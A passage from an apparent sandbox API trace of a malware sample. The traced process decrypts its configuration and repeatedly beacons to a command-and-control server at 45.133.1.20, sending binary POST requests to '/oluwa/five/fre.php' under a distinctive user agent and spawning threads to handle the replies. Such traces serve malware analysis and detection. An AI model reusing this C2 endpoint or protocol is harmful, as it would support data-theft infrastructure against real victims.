returned 0 [0283.941] GetProcessHeap () returned 0x6a0000 [0283.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0283.942] socket (af=2, type=1, protocol=6) returned 0xa60 [0283.942] connect (s=0xa60, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0283.964] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0283.964] GetProcessHeap () returned 0x6a0000 [0283.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0283.965] GetProcessHeap () returned 0x6a0000 [0283.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0283.966] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0283.970] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.970] GetProcessHeap () returned 0x6a0000 [0283.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9cf0 [0283.970] GetProcessHeap () returned 0x6a0000 [0283.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0283.971] GetProcessHeap () returned 0x6a0000 [0283.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0283.971] GetProcessHeap () returned 0x6a0000 [0283.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0283.972] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0283.973] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.973] GetProcessHeap () returned 0x6a0000 [0283.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0283.973] GetProcessHeap () returned 0x6a0000 [0283.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0283.974] send (s=0xa60, buf=0x6bd460*, len=242, flags=0) returned 242 [0283.974] send (s=0xa60, buf=0x6bb998*, len=159, flags=0) returned 159 [0283.975] GetProcessHeap () returned 0x6a0000 [0283.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0283.975] recv (in: s=0xa60, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0284.057] GetProcessHeap () returned 0x6a0000 [0284.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0284.058] GetProcessHeap () returned 0x6a0000 [0284.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0284.059] GetProcessHeap () returned 0x6a0000 [0284.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9cf0 | out: hHeap=0x6a0000) returned 1 [0284.059] GetProcessHeap () returned 0x6a0000 [0284.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0284.060] closesocket (s=0xa60) returned 0 [0284.060] GetProcessHeap () returned 0x6a0000 [0284.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0284.060] GetProcessHeap () returned 0x6a0000 [0284.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0284.061] GetProcessHeap () returned 0x6a0000 [0284.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0284.061] GetProcessHeap () returned 0x6a0000 [0284.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0284.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x17fc) returned 0xa60 [0284.063] Sleep (dwMilliseconds=0xea60) [0284.065] GetProcessHeap () returned 0x6a0000 [0284.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0284.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.068] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.074] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0284.082] GetProcessHeap () returned 0x6a0000 [0284.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8e90 [0284.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.083] CryptImportKey (in: hProv=0x6bec18, pbData=0x6d8e90, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0284.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.084] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.084] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.084] GetProcessHeap () returned 0x6a0000 [0284.085] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8e90 | out: hHeap=0x6a0000) returned 1 [0284.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.087] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0284.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.090] CryptDestroyKey (hKey=0x6ad020) returned 1 [0284.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.092] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0284.092] GetProcessHeap () returned 0x6a0000 [0284.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0284.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.093] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.095] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.100] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.101] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.101] GetProcessHeap () returned 0x6a0000 [0284.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0284.101] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.102] GetProcessHeap () returned 0x6a0000 [0284.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0284.102] GetProcessHeap () returned 0x6a0000 [0284.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0284.102] GetProcessHeap () returned 0x6a0000 [0284.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0284.103] GetProcessHeap () returned 0x6a0000 [0284.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0284.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.104] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.114] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0284.125] GetProcessHeap () returned 0x6a0000 [0284.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0284.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.127] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0284.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.130] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.133] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.133] GetProcessHeap () returned 0x6a0000 [0284.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0284.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.137] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0284.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.138] CryptDestroyKey (hKey=0x6ad020) returned 1 [0284.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.140] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0284.140] GetProcessHeap () returned 0x6a0000 [0284.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0284.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.141] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0284.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.142] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0284.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.143] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0284.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.144] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0284.144] GetProcessHeap () returned 0x6a0000 [0284.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0284.144] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0284.152] GetProcessHeap () returned 0x6a0000 [0284.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0284.152] socket (af=2, type=1, protocol=6) returned 0xa64 [0284.158] connect (s=0xa64, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0284.227] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0284.227] GetProcessHeap () returned 0x6a0000 [0284.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0284.227] GetProcessHeap () returned 0x6a0000 [0284.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0284.228] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0284.229] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.229] GetProcessHeap () returned 0x6a0000 [0284.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba170 [0284.229] GetProcessHeap () returned 0x6a0000 [0284.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0284.229] GetProcessHeap () returned 0x6a0000 [0284.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0284.230] GetProcessHeap () returned 0x6a0000 [0284.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0284.230] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0284.233] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.233] GetProcessHeap () returned 0x6a0000 [0284.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0284.233] GetProcessHeap () returned 0x6a0000 [0284.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0284.233] send (s=0xa64, buf=0x6bd460*, len=242, flags=0) returned 242 [0284.234] send (s=0xa64, buf=0x6bb998*, len=159, flags=0) returned 159 [0284.234] GetProcessHeap () returned 0x6a0000 [0284.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0284.234] recv (in: s=0xa64, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0284.302] GetProcessHeap () returned 0x6a0000 [0284.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0284.302] GetProcessHeap () returned 0x6a0000 [0284.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0284.305] GetProcessHeap () returned 0x6a0000 [0284.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba170 | out: hHeap=0x6a0000) returned 1 [0284.305] GetProcessHeap () returned 0x6a0000 [0284.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0284.306] closesocket (s=0xa64) returned 0 [0284.307] GetProcessHeap () returned 0x6a0000 [0284.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0284.308] GetProcessHeap () returned 0x6a0000 [0284.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0284.308] GetProcessHeap () returned 0x6a0000 [0284.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0284.309] GetProcessHeap () returned 0x6a0000 [0284.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0284.309] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6a4) returned 0xa64 [0284.312] Sleep (dwMilliseconds=0xea60) [0284.313] GetProcessHeap () returned 0x6a0000 [0284.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0284.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.316] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.328] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0284.342] GetProcessHeap () returned 0x6a0000 [0284.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0284.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.344] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0284.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.345] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.346] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.361] GetProcessHeap () returned 0x6a0000 [0284.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0284.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.364] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0284.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.367] CryptDestroyKey (hKey=0x6ad060) returned 1 [0284.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.368] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0284.368] GetProcessHeap () returned 0x6a0000 [0284.368] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0284.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.369] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.371] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.372] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.373] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.373] GetProcessHeap () returned 0x6a0000 [0284.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0284.373] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.376] GetProcessHeap () returned 0x6a0000 [0284.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0284.376] GetProcessHeap () returned 0x6a0000 [0284.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0284.376] GetProcessHeap () returned 0x6a0000 [0284.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0284.377] GetProcessHeap () returned 0x6a0000 [0284.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0284.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.378] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.383] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0284.389] GetProcessHeap () returned 0x6a0000 [0284.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0284.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.391] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0284.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.392] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.393] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.393] GetProcessHeap () returned 0x6a0000 [0284.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0284.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.394] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0284.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.395] CryptDestroyKey (hKey=0x6ad020) returned 1 [0284.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0284.398] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0284.398] GetProcessHeap () returned 0x6a0000 [0284.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0284.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.400] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0284.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.401] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0284.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.403] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0284.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0284.404] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0284.404] GetProcessHeap () returned 0x6a0000 [0284.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0284.404] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0284.404] GetProcessHeap () returned 0x6a0000 [0284.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0284.404] socket (af=2, type=1, protocol=6) returned 0xa68 [0284.405] connect (s=0xa68, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0284.429] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0284.430] GetProcessHeap () returned 0x6a0000 [0284.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0284.430] GetProcessHeap () returned 0x6a0000 [0284.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0284.431] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0284.432] wvsprintfA (in: param_1=0x6def40, 